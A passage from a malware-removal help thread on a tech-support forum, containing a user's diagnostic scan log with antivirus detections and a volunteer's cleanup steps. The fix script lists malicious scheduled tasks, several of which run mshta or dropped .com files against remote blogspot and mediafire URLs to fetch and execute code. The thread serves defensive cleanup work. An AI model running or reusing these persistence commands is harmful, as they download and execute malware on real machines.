(Intuit, Inc. -> ) FirewallRules: [{C56D2DB4-F018-43CF-8BA0-552A942055CF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{0443D1DB-8AC4-4860-B8D8-7D7CE906FEB1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{4E08147C-B286-40E3-8E99-41DC78FAB54E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{661270D3-1275-4409-B169-80F64214DDFB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0DF7B383-71E7-4158-B9F3-59F26F1BEE0F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0E6D62FB-0F41-4D85-94C6-0D68A6683ABB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5450D652-BD0C-41AF-97D0-51FF49667D55}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9CCB308A-C925-496A-AD4E-55FC1A92A23C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{C15C569D-71D8-4AAD-AB62-0717C4055D76}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{6C064A64-A6B1-4647-86BF-76473F9A7420}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{AD887500-B4E4-40B8-AB40-BF8A801265A1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{7B87E4EE-59E5-4200-B3F1-B3B610A0E198}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{4E6996B1-8F52-48E6-9ECF-BEC36C1D3EDE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{2C53049D-6015-43C2-BA8D-153FE3A2DD5C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{2FF8A498-A5CC-432F-9995-3E56AA82F050}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{4FCBF5AE-5F40-4EE8-8C15-A6E31E2DF734}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{3085921B-F6AE-4BCB-9AA4-B463983204C2}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{4C8CC311-3F98-41F8-A660-12AE58942448}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{05794537-CB6D-441F-A9D6-1FC5B471A04C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{E3C499AE-D0D0-4452-8625-50AB2E3EBF7A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{7F10A311-5142-4696-B0D4-1AA72AB8AEDD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{FACE0230-86C6-4163-821D-BAF2280DDF0E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{565D025D-B14F-4B46-A2E0-3522FA4F49E4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C1B40447-2FA5-4EC2-87BC-A8466AE6C19A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A7165A92-A88E-4940-B314-138AD7086775}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{5320A926-7413-4D53-AC70-7D0374649016}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{D66FC601-626A-4ADA-8269-8EDDFDB18B97}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{87D1E7D8-7B6A-4654-9F20-A65003E1E9AD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{88CD6A7E-A3AE-478D-BDFB-BD98CFF16766}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{0702F60D-B3B4-42B8-9DA1-EE8EBB0B40BC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{DF1C6D99-5E95-4713-AEDF-75914A2D4239}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{4E242E9A-D1C5-4B3A-9028-E0BC0AD9EF95}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{C32BF96D-3BA8-4BEB-83D7-073A8BBF7AB3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{CA3CDCE2-5FFB-4979-874E-E0727949BC5A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{CE21BA64-FE3D-45A8-B500-5639928FF995}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{D8C45C53-492C-47B3-9C79-A2A8E3B2259A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{90D53D47-BBDC-4306-87C1-A3783472D6E4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{D45406B1-FBA9-43F6-84A1-14790ED55486}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{604F7317-6DCF-4C2F-ADD6-794049F6F618}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{40A71165-7E0E-42DB-A143-4A778AF0A5F6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{C1D95454-84FE-4BCB-9BD1-DE811BADE17F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{6EFA8DB2-F8DC-459A-802B-F5BE5D5AFA6B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{394ADA8D-679A-4AAD-89CE-746CBC4DEA73}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{8F836148-2142-41B7-B6C1-FA07212FDC53}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E8B13576-EA96-459D-80A0-3A81EAA39D7B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{DB1423EB-BFB0-4BE4-A598-FA846AD72DB0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{F61B70B1-CF0D-47A7-A2CC-28D410FEF025}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B235ECC2-463A-4C2B-B587-47BC3EE0B42A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{C282B0A2-F9A9-4B1C-8211-700598B2048D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{E6D541D7-6B5D-4621-9088-4A4F08B1D0C4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{F75E650E-DA3F-4D9A-8404-94F1B21EC890}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{12AE0005-5F5D-4F74-AFEB-21E3F9234F51}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6BCE991F-1058-4032-A9F0-26A6DB559827}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{934CFBC7-D283-467C-B66A-DAEEB0AC8C6B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{28C48FBF-BCE1-498F-B439-C4C6293B8295}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{2C944978-4CA0-4F30-AE37-F4DE007FE024}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{8A43FAA2-7119-4A06-B00B-CB8C94F48B78}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{676AC531-6967-4780-BAAB-38F6C62AE38E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{E9359140-B0A3-46B0-B4B2-D7B7B5992CE9}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{2DBA4F34-8C86-46A1-9783-9A15781DADFA}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{606894B9-3C5E-44EE-B918-AD14EA934C09}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{A0E4901C-6C44-4BD8-9805-C981D10416DC}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.80.194.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [TCP Query User{D2EF6376-3F06-49E3-96D0-83489E51100C}C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe (UUMART LIMITED -> AndroidAssistServer) FirewallRules: [UDP Query User{6FD277AE-9C2D-48F5-85F5-80EBE46ADD12}C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe] => (Allow) C:\program files (x86)\mobikin\mobikin assistant for android\3.12.16\bin\androidassistserver.exe (UUMART LIMITED -> AndroidAssistServer) FirewallRules: [{40A557CB-6DDE-4F48-A21E-693B97C5A43E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Restore Points ========================= 18-03-2022 12:29:20 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============ Name: ExpressVPN TAP Adapter Description: ExpressVPN TAP Adapter Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: ExpressVPN Service: tapexpressvpn Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ======================== Application errors: ================== Error: (03/22/2022 08:01:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: bad_module_info, version: 0.0.0.0, time stamp: 0x00000000 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x36991fe7 Faulting process id: 0x26dc Faulting application start time: 0x01d83e4918b4e29c Faulting application path: bad_module_info Faulting module path: unknown Report Id: 2a1ba1da-e322-4df4-8073-3fe554da0f1a Faulting package full name: Faulting package-relative application ID: Error: (03/22/2022 03:42:30 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": WPR: calling ABORT_CLOSE Error: (03/22/2022 03:42:25 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": WPR: calling ABORT_CLOSE Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": DBConnPool::HandleConnectionError errorCode:-6069, dbCode:-103 from file:'src\connpool.cpp' at line 1043 from function:'DBMgr::DBConnPool::init' Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": Connection String:CON=QBConnectionPool-Probe-QB_DESKTOP-ID6UD18_31;;DBF=C:\Users\Public\Documents\Intuit\QuickBooks\Company Files\21E\KRH\KRH 21E.QBW;CommLinks="ShMem,tcpip(IP=192.168.1.2;TO=5;DOBROADCAST=NONE;port=63718)";ServerName=QB_DESKTOP-ID6UD18_31;DBN=e0f42625559a46f1ba0026e2ac1da2f5 Error: (03/22/2022 03:40:43 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": Connection Error:Invalid user ID or password Error: (03/22/2022 03:40:41 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": DBConnPool::HandleConnectionError errorCode:-6069, dbCode:-103 from file:'src\connpool.cpp' at line 1043 from function:'DBMgr::DBConnPool::init' Error: (03/22/2022 03:40:41 PM) (Source: QuickBooks) (EventID: 4) (User: ) Description: An unexpected error has occured in "Intuit QuickBooks Enterprise Solutions: Accountant 21.0": Connection String:CON=QBConnectionPool-Probe-QB_DESKTOP-ID6UD18_31;;DBF=C:\Users\Public\Documents\Intuit\QuickBooks\Company Files\21E\KRH\KRH 21E.QBW;CommLinks="ShMem,tcpip(IP=192.168.1.2;TO=5;DOBROADCAST=NONE;port=63718)";ServerName=QB_DESKTOP-ID6UD18_31;DBN=319c8aad2ce34214be3f0ea3d5e76468 System errors: ============= Error: (03/22/2022 02:26:36 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The AMD User Experience Program Launcher service terminated unexpectedly. It has done this 1 time(s). Error: (03/22/2022 12:48:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Print Spooler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service. Error: (03/22/2022 09:30:26 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The QBWCMonitor service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion. Error: (03/22/2022 09:30:26 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the QBWCMonitor service to connect. Error: (03/22/2022 09:24:53 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The AMD User Experience Program Launcher service terminated unexpectedly. It has done this 1 time(s). Error: (03/22/2022 08:54:03 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The AMD User Experience Program Launcher service terminated unexpectedly. It has done this 1 time(s). Error: (03/18/2022 06:12:50 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY) Description: Installation Failure: Windows failed to install the following update with error 0x80073d02: 9NMPJ99VJBWV-Microsoft.YourPhone. Error: (03/11/2022 07:10:49 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The AMD User Experience Program Launcher service terminated unexpectedly. It has done this 1 time(s). Windows Defender: ================ Date: 2022-03-23 08:25:11 Description: Microsoft Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:MSIL/CryptInject&threatid=2147764265&enterprise=0 Name: VirTool:MSIL/CryptInject Severity: Severe Category: Tool Path: file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll Detection Origin: Local machine Detection Type: FastPath Detection Source: Real-Time Protection Process Name: C:\Windows\SysWOW64\cmd.exe Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS: 1.361.529.0 Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8 Date: 2022-03-23 08:05:07 Description: Microsoft Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:Win32/Bladabindi!ml&threatid=2147748148&enterprise=0 Name: Backdoor:Win32/Bladabindi!ml Severity: Severe Category: Backdoor Path: amsi:_\Device\HarddiskVolume3\ProgramData\timagar.com Detection Origin: Unknown Detection Type: FastPath Detection Source: AMSI Process Name: C:\ProgramData\timagar.com Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS: 1.361.529.0 Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8 Date: 2022-03-23 07:03:14 Description: Microsoft Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:MSIL/CryptInject&threatid=2147764265&enterprise=0 Name: VirTool:MSIL/CryptInject Severity: Severe Category: Tool Path: file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll; file:_C:\WINDOWS\sysWOW64\dismcore.dll Detection Origin: Local machine Detection Type: Concrete Detection Source: Real-Time Protection Process Name: C:\Windows\SysWOW64\cmd.exe Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS: 1.361.529.0 Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8 Date: 2022-03-23 07:03:11 Description: Microsoft Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/UACBypassExp.S&threatid=2147739683&enterprise=0 Name: Behavior:Win32/UACBypassExp.S Severity: Severe Category: Suspicious Behavior Path: behavior:_pid:2884:109623877976470; file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll Detection Origin: Local machine Detection Type: Concrete Detection Source: System Process Name: Unknown Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS: 1.361.529.0 Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8 Date: 2022-03-23 07:03:11 Description: Microsoft Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/UACBypassExp.S&threatid=2147739683&enterprise=0 Name: Behavior:Win32/UACBypassExp.S Severity: Severe Category: Suspicious Behavior Path: behavior:_pid:2884:109623877976470; file:_C:\Users\Karin Hostetler\AppData\Local\Temp\dismcore.dll Detection Origin: Local machine Detection Type: Concrete Detection Source: System Process Name: Unknown Security intelligence Version: AV: 1.361.529.0, AS: 1.361.529.0, NIS: 1.361.529.0 Engine Version: AM: 1.1.19000.8, NIS: 1.1.19000.8 CodeIntegrity: =============== Date: 2022-03-23 08:31:16 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2022-03-23 08:28:21 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements. ==================== Memory info =========================== BIOS: LENOVO IRKT59AUS 08/12/2016 Motherboard: LENOVO 0x36A017AA Processor: AMD A10-7800 Radeon R7, 12 Compute Cores 4C+8G Percentage of memory in use: 60% Total physical RAM: 11211.6 MB Available physical RAM: 4429.62 MB Total Virtual: 15179.6 MB Available Virtual: 4825.08 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:1831.17 GB) (Free:1638.81 GB) NTFS Drive i: (My Passport) (Fixed) (Total:931.48 GB) (Free:794.08 GB) NTFS \\?\Volume{0a324fcb-7035-4eb0-963e-8812003b095b}\ (WinRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS \\?\Volume{c4e33b6f-fe2f-47f0-a23e-427135013c69}\ (LENOVO_PART) (Fixed) (Total:30 GB) (Free:17.24 GB) NTFS \\?\Volume{e54d1db3-7d2c-4058-ac24-b883e5632ad8}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32 ==================== MBR & Partition Table ==================== ========================================================== Disk: 0 (Size: 1863 GB) (Disk ID: C3FB2441) Partition: GPT. ========================================================== Disk: 1 (Size: 931.5 GB) (Disk ID: 16F2A91F) Partition: GPT. ==================== End of Addition.txt ======================= Edited by Oh My!, 23 March 2022 - 03:14 PM. * Back to top -------------------------------------------------------------------------------- BC ADBOT (LOGIN TO REMOVE) * * BleepingComputer.com * * Register to remove ads PLAY Top Articles Video Settings Full Screen About Connatix V156852 Read More Read More Read More Read More Read More Read More EU draft law adds security checks to allcrypto transactions 1/1 Skip Ad Continue watching after the ad Visit Advertiser websiteGO TO PAGE -------------------------------------------------------------------------------- #2 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 23 March 2022 - 09:29 AM Greetings Karin and to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum. My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary. =================================================== Ground Rules: * First, please keep in mind most of us at BleepingComputer volunteer our assistance for your benefit in your time of need. Please try to match our commitment to you with your patience toward us. * It is important to not run any tools or take any steps other than those I will provide for you. * Please perform all steps in the order they are listed. If things are not clear or you experience problems be sure to stop and let me know. * Please copy and paste all logs into your post unless otherwise requested. * When your computer is clean I will let you know, provide instructions to remove tools and reports, and offer you information about how you can combat future infections. * If you do not reply to your topic after 5 days I will assume it has been abandoned and I will close it. =================================================== Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and let me know. Please allow me some time to review what you have posted. I will be posting back a bit later today. Edited by Oh My!, 23 March 2022 - 09:31 AM. Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #3 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 23 March 2022 - 09:36 AM Thank you, Gary!! I will be keeping this post up and constantly monitoring. At this point I have fired up my back up laptop, downloaded needed files and hoping to minimize the damage as much as possible. * Back to top -------------------------------------------------------------------------------- #4 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 23 March 2022 - 04:01 PM Hi Karin. Thank you for your patience. Your computer is infected so let's start with this. =================================================== Deleting Chrome Notifications -------------------- * Launch Chrome * In the address bar type chrome://settings/content/notifications and hit Enter * Scroll down to Allowed to send notifications * For any entry you are not familiar with or do not want click on the 3 horizontal dots to the right and select Remove =================================================== Malwarebytes AdwCleaner ------------------- * Please download AdwCleaner and save it to your Desktop * Close all open programs and browsers * Right click on the icon and select Run as administrator * Click Scan now * Allow the program to Quarantine what it finds except for Pre-installed applications if you would like to keep those or other entries you would like to keep * When completed click View Scan Log File * Copy and paste the contents in your reply * Click Skip Basic Repair if it appears then close the program =================================================== Farbar Recovery Scan Tool Fix -------------------- * Right click on the FRST icon and select Run as administrator * Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied * There is no need to paste the information anywhere, FRST will do it for you Start:: CreateRestorePoint: CloseProcesses: Folder: C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision Folder: C:\Users\Karin Hostetler\AppData\Local\mbam HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File) HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files (x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File) HKLM-x32\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO Connect\DYMO.WebApi.Win.Host.exe" /auto (No File) HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label Software\DLSService.exe" (No File) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} - System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw => "C:\ProgramData\ddond.com" [Argument = "https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"] Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} - System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe" "hxxps://mainnewstart1mob.blogspot.com/atom.xml" Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => 